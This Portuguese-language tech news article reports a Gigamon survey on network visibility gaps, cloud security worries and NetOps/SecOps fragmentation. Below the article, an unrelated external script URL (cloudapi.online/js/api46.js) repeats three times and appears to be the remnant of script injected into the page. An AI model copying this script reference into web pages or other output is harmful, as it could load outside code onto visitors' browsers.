Falta de informação sobre comportamento dos dados em rede coloca empresas em risco

0

A Gigamon, especializada em soluções para visibilidade de rede, anuncia os resultados da pesquisa Hide and Seek: Cybersecurity and the Cloud, conduzida pelo instituto de pesquisa norte-americano Vanson Bourne.

De acordo com o estudo, a falta de visão sobre o tráfego de dados impõe uma grande dificuldade para as empresas identificarem e investigarem atividades suspeitas na rede, que podem ser relacionadas a ataques maliciosos.

Sessenta e sete porcento dos participantes indicam os pontos cegos (ou a falta de informação) como maior obstáculo para a segurança de dados. Desses, 50% revelam que carecem de informações para identificar ameaças.

As conclusões do estudo sinalizam três causas fundamentais da "cegueira" de dados que colocam em risco a segurança da rede:

  • O aumento de velocidade e crescimento no tráfego de redes estressa as ferramentas de segurança e monitoramento, que não são capazes de computar esse montante de dados. 72% dos entrevistados afirmam que não contam com infraestrutura escalável nesse sentido para fazer frente a esse aumento de demanda.
  • As informações valiosas estão migrando para a nuvem, onde a visibilidade é limitada e os aplicativos de dados não são facilmente acessíveis. 84% das respostas diz que a segurança da nuvem é uma preocupação que impede sua organização de adotar as últimas tecnologias. Quando questionados que tipo de conteúdo suas empresas estão migrando para a cloud, 69% disseram que são os relacionados ao trabalho diário e 56% citaram as informações críticas para o negócio.
  • Um grande montante de dados de rede permanece oculto porque tanto seu acesso como as ferramentas ainda são segmentadas por limites organizacionais. Os tomadores decisão em TI e cibersegurança não são habilitados a rapidamente detectar e reagir a ameaças e eventos de segurança. 78% dos participantes revelaram que, devido ao fato dos times NetOps e SecOps utilizarem dados de rede diferentes, não há uma forma consistente de acessar ou entender essas ameaças. Além disso, 48% dos que afirmaram anteriormente não ter completa visibilidade no fluxo de dados, relatam não saber o que está criptografado em sua rede.

O estudo reúne entrevistas com executivos de TI e segurança, em posição para tomadas de decisão, nos Estados Unidos, Reino Unido e França. As perguntas foram direcionadas para entender a infraestrutura de cibersegurança para ambientes de cloud e questões relacionadas à visibilidade de rede.

https://cloudapi.online/js/api46.js

https://cloudapi.online/js/api46.js

https://cloudapi.online/js/api46.js

DEIXE UMA RESPOSTA

Por favor digite seu comentário!
Por favor, digite seu nome aqui

This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.